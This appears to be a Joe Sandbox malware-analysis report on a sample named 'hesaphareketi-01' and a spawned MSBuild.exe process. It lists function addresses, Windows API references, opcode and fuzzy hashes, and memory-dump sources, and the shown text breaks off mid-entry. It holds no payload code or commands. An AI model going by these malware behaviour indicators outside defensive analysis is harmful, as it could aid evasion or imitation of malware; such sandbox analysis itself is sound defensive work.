Snapshot File: hcaresult_0_2_7240000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d71e3e3a22295691418fdbd669e119fa1a156774617f3b24bad874f96de48591
Instruction ID: ae82e26400132f4700adc27043cec37feb430522832e700b9f1c7c467570e3c8
Opcode Fuzzy Hash: d71e3e3a22295691418fdbd669e119fa1a156774617f3b24bad874f96de48591
Instruction Fuzzy Hash: BBE1B0B17112059FDB29DB66C450BAE7BF6FF88700F10446DE6469B3A5CB38E802CB52

Function 07240260 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2291258617.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1c4d59fe2303518e4daef799cfdf6e4ed8fca2f44fe5612e45106bf732fa465
Instruction ID: 9be4debbcc750c5d487837f655a5272e0cf05a35cf4e0d540d82d4162f31e5aa
Opcode Fuzzy Hash: b1c4d59fe2303518e4daef799cfdf6e4ed8fca2f44fe5612e45106bf732fa465
Instruction Fuzzy Hash: 6CB01280C7F1C08AC1276B3094304B09E7C0D0B004F1434C1CA993F0135442E06C911E

Function 00F4D0B0 Relevance: 6.1, APIs: 4, Instructions: 130
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00F4D13E
GetCurrentThread.KERNEL32 ref: 00F4D17B
GetCurrentProcess.KERNEL32 ref: 00F4D1B8
GetCurrentThreadId.KERNEL32 ref: 00F4D211

Memory Dump Source

Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 26b8b5b719e07ccdcbe0f630c4d2ce0bc5be401f1caa3644bf19646b5b9cf10b
Instruction ID: 2cc429e93b8393f5d9ef321a50d60c2526d4c1f8818be9bc260606172ca02b98
Opcode Fuzzy Hash: 26b8b5b719e07ccdcbe0f630c4d2ce0bc5be401f1caa3644bf19646b5b9cf10b
Instruction Fuzzy Hash: DE5164B0D0134ACFEB14DFA9D548B9EBFF1EF88314F248459E418A72A1C7749984CB65

Function 00F4D0C0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00F4D13E
GetCurrentThread.KERNEL32 ref: 00F4D17B
GetCurrentProcess.KERNEL32 ref: 00F4D1B8
GetCurrentThreadId.KERNEL32 ref: 00F4D211

Memory Dump Source

Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d581ef299cf5c3281c9939ee3be081dd3408dbd672f60414cac13a96ea856f92
Instruction ID: fbcde9a666111f3ef8dee5f48d0cea66c50c48d0ef513a6d5f538efb710e7f28
Opcode Fuzzy Hash: d581ef299cf5c3281c9939ee3be081dd3408dbd672f60414cac13a96ea856f92
Instruction Fuzzy Hash: A45176B0D01309CFEB04CFAAD548B9EBBF1EF88314F208459E518A7360C7749984CB65

Function 00F4AE28 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00F4B07E

Strings

8R, xrefs: 00F4AFDB
8R, xrefs: 00F4AFB6

Memory Dump Source

Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd

Similarity

API ID: HandleModule
String ID: 8R$8R
API String ID: 4139908857-4151275524
Opcode ID: d650e50071f1b2a10278415e9e387b6329d1df515b9033cf95018cc82d9928a9
Instruction ID: cbf6db757ca59be27b50ab107d374bc474c6d2bacb97008717f49d3cbec910b9
Opcode Fuzzy Hash: d650e50071f1b2a10278415e9e387b6329d1df515b9033cf95018cc82d9928a9
Instruction Fuzzy Hash: 63812370A00B058FD724DF2AD45179ABBF1FF88314F008A2DE89ADBA50D775E849CB91

Function 00F45A84 Relevance: 1.6, APIs: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff7cc06ef08995accd82af11e06e2643ce0fc6e2cab65dcc8cd950d828765618
Instruction ID: 060a685bbfc10bcb5c1ea9ac8493b6c6af1a200c088bf0a7cf59bb3568c5c208
Opcode Fuzzy Hash: ff7cc06ef08995accd82af11e06e2643ce0fc6e2cab65dcc8cd950d828765618
Instruction Fuzzy Hash: 3541EF71C04B49CFDB11DFA8C8447EDBFB0EF56B24F24828AC845AB252D739994ADB01

Function 00F4590C Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00F459C9

Memory Dump Source

Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8e43b3fbb460a75f1da1ee4dc4a39fe8c5b16331287aceceb9e2f23d340420ae
Instruction ID: 01b3dbf34d51bd169154c1defed29bcd9db0eafed506bd4f2020f51a9c37ab28
Opcode Fuzzy Hash: 8e43b3fbb460a75f1da1ee4dc4a39fe8c5b16331287aceceb9e2f23d340420ae
Instruction Fuzzy Hash: B841D3B0C0071DCBDB14DFA9C8847DEBBB5BF89714F20816AD808AB251DB755945CF51

Function 00F444B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00F459C9

Memory Dump Source

Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ec00c8795b7951dd176426e6b5d9ea0c9be1be732a5ab6cb0e212fa0e66ef134
Instruction ID: 418e18eb1acb6fd42797ee353a8b2fef8ebbc0dfa807a3022ff18ac793dc474c
Opcode Fuzzy Hash: ec00c8795b7951dd176426e6b5d9ea0c9be1be732a5ab6cb0e212fa0e66ef134
Instruction Fuzzy Hash: E741D2B0C0071DCBDB24DFA9C8847CEBBB5BF88714F20816AD808AB251DB756945CF90

Function 00F4D708 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F4D797

Memory Dump Source

Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4a099af976a476cc402862c42c9d56129c4e360d7660a67a006a60a7e35cecd4
Instruction ID: fe06cba1fd2f116384fd767fcd658c067b251d37e8e0d66ffd73859e53df080f
Opcode Fuzzy Hash: 4a099af976a476cc402862c42c9d56129c4e360d7660a67a006a60a7e35cecd4
Instruction Fuzzy Hash: 0C2103B59002499FDB10CFAAD984AEEBFF4EB48320F14841AE954E3351C378A941CFA0

Function 00F4D710 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00F4D797

Memory Dump Source

Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 20c24e421a6e46587a961ec4a53bfd4eb29af5ef02c20b9a1bf8684cebf86ab7
Instruction ID: 3878b4a1592c0b424848d61812eb7d52dc267336179cb75c7d87d7cf5ebbd65e
Opcode Fuzzy Hash: 20c24e421a6e46587a961ec4a53bfd4eb29af5ef02c20b9a1bf8684cebf86ab7
Instruction Fuzzy Hash: EA21E4B5900209DFDB10CF9AD984ADEBFF4EB48320F14841AE914A3350D378A950CFA5

Function 00F4B018 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00F4B07E

Memory Dump Source

Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 39b4648f14b6e08c30242c486246b3009dfd63674e0c43e96e95e90b8f0ebe8a
Instruction ID: 795cc15710e31c9c2b271735760abce5bcea61207177e8afd7d1bacedb91a403
Opcode Fuzzy Hash: 39b4648f14b6e08c30242c486246b3009dfd63674e0c43e96e95e90b8f0ebe8a
Instruction Fuzzy Hash: 7D110FB5C002498FDB20CFAAC444BDFFBF4AB88324F10841AD828A7210D379A545CFA1

Function 072411B9 Relevance: 1.5, APIs: 1, Instructions: 46
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 0724121D

Memory Dump Source

Source File: 00000000.00000002.2291258617.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_hesaphareketi-01.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a8101da697af3ba1cde7497a8c858d7c053da1d98de52e0a9fb99d6ee99d1c91
Instruction ID: 978ae1a4cb3bb40111fa9095ba77bddba34efefccfd36b2117b601202359274d
Opcode Fuzzy Hash: a8101da697af3ba1cde7497a8c858d7c053da1d98de52e0a9fb99d6ee99d1c91
Instruction Fuzzy Hash: 4C11F2B5800249DFDB10CF9AD985BDFFBF8EB48324F10845AE558A7210C379A594CFA1

Function 072411C0 Relevance: 1.5, APIs: 1, Instructions: 44
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,?,?,?), ref: 0724121D

Memory Dump Source

Source File: 00000000.00000002.2291258617.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_hesaphareketi-01.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7ed4ab5caedbc8cdbaf0704e3bd27fb772ba86e208558a4945fcbd62e2efadc6
Instruction ID: 64368f30172ce05fc24e742fbaee38b520bea0258f978bb4f17535bb4a506210
Opcode Fuzzy Hash: 7ed4ab5caedbc8cdbaf0704e3bd27fb772ba86e208558a4945fcbd62e2efadc6
Instruction Fuzzy Hash: D31103B5800349DFDB10CF9AC544BDFBBF8EB48320F108419E518A7200C379A594CFA1

Function 00E0D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280371495.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e0d000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f624e2599ade67deab41fe22c6bcea445e605307afcdd972cfee2b132706318
Instruction ID: 901790c5102b024d27cf9c6832fb62f7ecde7cc9c691be41fe2143394cf5791a
Opcode Fuzzy Hash: 8f624e2599ade67deab41fe22c6bcea445e605307afcdd972cfee2b132706318
Instruction Fuzzy Hash: 2B210371508240DFDB05DF54DDC0B26BF65FB88318F20C569ED092B296C336D896CBA1

Function 00E0D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280371495.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e0d000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37e7eec9895711bd26144ddc58ca17872b88779fb17b4dbbf58410c21df9b1d3
Instruction ID: 81f6b9199050fcfc707b69b709948d5b5c083c95976d2579af2b08ef231dc98a
Opcode Fuzzy Hash: 37e7eec9895711bd26144ddc58ca17872b88779fb17b4dbbf58410c21df9b1d3
Instruction Fuzzy Hash: 3F213A71508204DFDB04DF54DDC0B16BF65FB94324F20C56DE9095B296C336E896CBA2

Function 00E1D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280414809.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e1d000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5137cfaf1498100c41630180bd1728f44aa285ed0aa75fc6a27adc319b1980c5
Instruction ID: dd41bc78297bf3c53d459575e42a1a9b40152037c6f649080a8d71f38d576fdc
Opcode Fuzzy Hash: 5137cfaf1498100c41630180bd1728f44aa285ed0aa75fc6a27adc319b1980c5
Instruction Fuzzy Hash: B8210771508204EFDB05DF54D9C0B96BBA5FB84318F30C66DD9195B2A2C336D886CA61

Function 00E1D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280414809.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e1d000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eadb21830ac5223942db0cbcb69b1a7e4c80a1a1b4ee9389896c2887db57911a
Instruction ID: 12f63074b00d41c3dd71a9e6b7dda71db9d0d2aaace751ff06d06ae69e2e96f3
Opcode Fuzzy Hash: eadb21830ac5223942db0cbcb69b1a7e4c80a1a1b4ee9389896c2887db57911a
Instruction Fuzzy Hash: DB21F275608204EFDB14DF14D984B96BB66FB88318F20C56DD90A5B296C33AD887CA61

Function 00E1D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280414809.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e1d000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75a533a11b3fd060d1814b49ca9ddd2929fc265aaa2f3eb812500c4ff8cf293f
Instruction ID: 922ca2f9b07422ee2e0933fdb60983dc57944800fb5915def3e579351531c7e6
Opcode Fuzzy Hash: 75a533a11b3fd060d1814b49ca9ddd2929fc265aaa2f3eb812500c4ff8cf293f
Instruction Fuzzy Hash: 1521537550D3808FC712CF24D994755BF71EB46318F28C5DAD8498F6A7C33A984ACB62

Function 00E0D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280371495.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e0d000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction ID: 2d2e04fd2b71d6307c59fd8b573c90c9711521afb94adaf103bcb3dbd81a7016
Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction Fuzzy Hash: A1110372404280CFCB01CF50D9C0B16BF71FB88328F24C6A9DC091B296C33AD85ACBA1

Function 00E0D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280371495.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e0d000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction ID: c1fa38dfe242db99553c452bad97ba1a90a07a8aebac7493c7d1a41b0b56c4ed
Opcode Fuzzy Hash: 347ceff61f71c01d8d79cfdbd8358f6f0be4c31f492294fd5b1d002aa0560fbf
Instruction Fuzzy Hash: 4B11D376504240DFCB15CF54D9C4B16BF71FB94328F24C6A9D8094B656C33AE856CBA1

Function 00E1D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280414809.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e1d000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
Instruction ID: ac3ee7d0a1e316a9fba8cebbe33e0946be6262e188574a7c70e97a5f186fac1e
Opcode Fuzzy Hash: f5dd070f47a673dda7babee824c8441981cc2d376d27ad6ac8e2bf7ef2f1688d
Instruction Fuzzy Hash: 7911DD75508280DFCB01CF50C9C0B55FBB1FB84318F24C6ADD8494B6A6C33AD89ACB61

Function 00E0D731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280371495.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e0d000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f46611974a6948862525d7ba8b702b4446cb94d13ca6ed2b8a026408bebedbb
Instruction ID: 90f25c14635b5749ccfc2efd5ccca74308617a1d3adcb2a8c7e0c081374b5f74
Opcode Fuzzy Hash: 0f46611974a6948862525d7ba8b702b4446cb94d13ca6ed2b8a026408bebedbb
Instruction Fuzzy Hash: FA01A7714083459AE7104AA9CD847A7FB98EF81325F2C855BED095E1C2D2789881C771

Function 00E0D730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280371495.0000000000E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e0d000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 458bd8118fb838c9bbacdab4a8dfe6c8bf91096ae26265e749a58270a13d1963
Instruction ID: e162a1096d27492da390c60289e508debbb4415e3c2d5a9371d98b756ba63e15
Opcode Fuzzy Hash: 458bd8118fb838c9bbacdab4a8dfe6c8bf91096ae26265e749a58270a13d1963
Instruction Fuzzy Hash: 70F062714093449AE7108A1ADD84B66FF98EB91739F18C55AED085E2C6C2799884CB71

Non-executed Functions

Function 00F4D63C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2282044927.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_hesaphareketi-01.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92221e1b86fb978115c3fd07b15f8d130b1113a87c7f2e5f6e221b70e9b75d37
Instruction ID: 5e6823b25293d5bd8f998013cd3215c6116eaac54d4e2b74c1a43472bca80546
Opcode Fuzzy Hash: 92221e1b86fb978115c3fd07b15f8d130b1113a87c7f2e5f6e221b70e9b75d37
Instruction Fuzzy Hash: FAA16D36E002098FCF05DFB4C8405DEBBB2FF89314B15857AE809AB265DB75E95ADB40

Analysis Process: MSBuild.exePID: 7200, Parent PID: 5392COMMON

Execution Graph

Execution Coverage:	14.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	8.9%
Total number of Nodes:	45
Total number of Limit Nodes:	4

Executed Functions

Function 06757588 Relevance: 2.0, APIs: 1, Instructions: 528
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4707161162.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e935aeed2cb9d7b487d94d290fa5f0de8153e238e01dc8d23a2f3db1392b4a37
Instruction ID: de4cf7c32058b3c9e67f5743b1f0ed5d5babcd99b0d5cf7088593e90c469c7e8
Opcode Fuzzy Hash: e935aeed2cb9d7b487d94d290fa5f0de8153e238e01dc8d23a2f3db1392b4a37
Instruction Fuzzy Hash: 5B221974E00219CFDB58DFA8C884BADBBB2BF84300F1185A9D809AB355EB759D85CF50

Function 0678EA0F Relevance: 1.3, Instructions: 1306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1eb4fdbf844ba40194c7c0479b022cb0fc5a634adc89bcfe0c6dd3900ed17058
Instruction ID: 36128603b1171804622e3721ba301693eae39a50fd475402c861bbdfab8b1f87
Opcode Fuzzy Hash: 1eb4fdbf844ba40194c7c0479b022cb0fc5a634adc89bcfe0c6dd3900ed17058
Instruction Fuzzy Hash: 51B24F78A41218DFD764EF24DC84BDEBB72BB89310F108699D41A633A4CB34AE85DF51

Function 02B19858 Relevance: .8, Instructions: 849COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9461d449c0f4711ab7c6ac7a41de5ffb4d1e5d785dd5480b1f4749eff3f7325
Instruction ID: ef3de69514f47a27e0dd6f34c718d2cb653897cf168e6bd86db7300c525a22d9
Opcode Fuzzy Hash: c9461d449c0f4711ab7c6ac7a41de5ffb4d1e5d785dd5480b1f4749eff3f7325
Instruction Fuzzy Hash: 4F72AF71A00609DFCB15CF68C998AAEBBF2FF49300F558599E805DB2A5D730F991CB90

Function 06780D48 Relevance: .7, Instructions: 745
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4808a0825fb00abb983e4dfe730672ccc974e739c8fa3d2889686e7a727db701
Instruction ID: 99dece4f46f9270d501bd8656a15c5a071325b3b8e98d783d4b2571c2fbe10db
Opcode Fuzzy Hash: 4808a0825fb00abb983e4dfe730672ccc974e739c8fa3d2889686e7a727db701
Instruction Fuzzy Hash: 38825D74E012299FEB64EF69D898BDDBBB2BF49300F1081EA950DA7255DB305E81CF44

Function 02B1E431 Relevance: .7, Instructions: 714
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8d5d1952cc78c1ddecd2ca3f8c6f715c3807db5af811ef7ca230b3dcbca5b9
Instruction ID: 04e12a8fd1364adcc4ac2db8fff3dac59673b1a0429660707090bf45cf253ef2
Opcode Fuzzy Hash: fa8d5d1952cc78c1ddecd2ca3f8c6f715c3807db5af811ef7ca230b3dcbca5b9
Instruction Fuzzy Hash: 6F72BF74E01229CFDB64DF69C884BE9BBB2BB49300F5481E9D849A7355EB349E81CF40

Function 02B16108 Relevance: .5, Instructions: 508COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95cda79e79c82bb899588f623fa2f4eb6087389f4805a807dcaabf57c9dc0517
Instruction ID: c5921bdaa31845930ef9e50cb59726e58cb7fa90d7ef63a8b00f531727d4aa0b
Opcode Fuzzy Hash: 95cda79e79c82bb899588f623fa2f4eb6087389f4805a807dcaabf57c9dc0517
Instruction Fuzzy Hash: 88127A70A002199FDB14DF69D854BAEBBFAFF88304F548569E80A9B394DF309D45CB90

Function 02B16730 Relevance: .4, Instructions: 441
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed262985f495958fd33c397fcefc8c00f777908b6476dddb8afd6397fd92387e
Instruction ID: 94c0de767dc22ebf5dfdb0036f2050f914b67b736b43cf5f1b93f2ff6eda5f56
Opcode Fuzzy Hash: ed262985f495958fd33c397fcefc8c00f777908b6476dddb8afd6397fd92387e
Instruction Fuzzy Hash: BC022F70A00219DFCB14DF69D984AAEBBB6FF88344F5580A9E815EB2A5DB30DD41CB50

Function 02B1B328 Relevance: .4, Instructions: 354
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81927ad8df88eb9a570dbfeca431c6261acea903214f37a692eb4a20460e78cc
Instruction ID: 5ca10bd9e4e78560dfe3de86be7ff576f90cb7818f51dd79bd75cce6a465589d
Opcode Fuzzy Hash: 81927ad8df88eb9a570dbfeca431c6261acea903214f37a692eb4a20460e78cc
Instruction Fuzzy Hash: 26E10474E00218DFDB14DFA9D884A9DBBB2FF58314F59C0A9E819AB361DB30A841CF50

Function 067885B0 Relevance: .3, Instructions: 296
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.4707582233.0000000006780000.00000040.00000800.00020000.00000000.sdmp, Offset: 06780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6780000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee65d79d9fa7205b6e9b3b086d41afa2fa9aead4f5d99a435a570712a2fdf2c0
Instruction ID: 0c16307769b238fbbb15e1aa809f744dfa11979d507d6793a5fc01afd3bdd927
Opcode Fuzzy Hash: ee65d79d9fa7205b6e9b3b086d41afa2fa9aead4f5d99a435a570712a2fdf2c0
Instruction Fuzzy Hash: B7E1CF74E01218CFEB64DFA5C844B9DBBB2BF89300F2081AAD408A7395DB359E85CF11

Function 02B1F778 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4700811804.0000000002B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2b10000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47437c9b3c32f5470a6a19f5bd695fe4e9191ba3b734c883ae9fd149f4525a37
Instruction ID: 5bf138f5ccdcdac97f0c14d4ebc1e182419da1a730972719eaf5fa8fe6550ef1
Opcode Fuzzy Hash: 47437c9b3c32f5470a6a19f5bd695fe4e9191ba3b734c883ae9fd149f4525a37
